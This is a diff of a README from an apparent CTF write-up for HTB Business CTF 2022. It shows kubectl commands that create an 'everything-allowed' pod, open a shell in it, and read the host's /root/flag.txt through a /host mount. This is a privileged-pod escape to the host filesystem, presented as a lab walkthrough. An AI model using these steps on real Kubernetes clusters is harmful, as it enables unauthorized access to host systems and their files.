und3rcraft/writeups/htb_business_ctf_2022_dirty_money/cloud/operator/README.md

 ```

-Create the pod and drop into a shell
+Create the pod and drop into a shell.
 ```
 k create -f p1.yml -n awx
 k exec -n awx -it  everything-allowed-exec-pod -- /bin/bash
 ```

-Once in we can navigate to the host system under `/host` and find the flag
+Once in we can navigate to the host system under `/host` and find the flag.

 ```
 bash-4.4# cat /host/root/flag.txt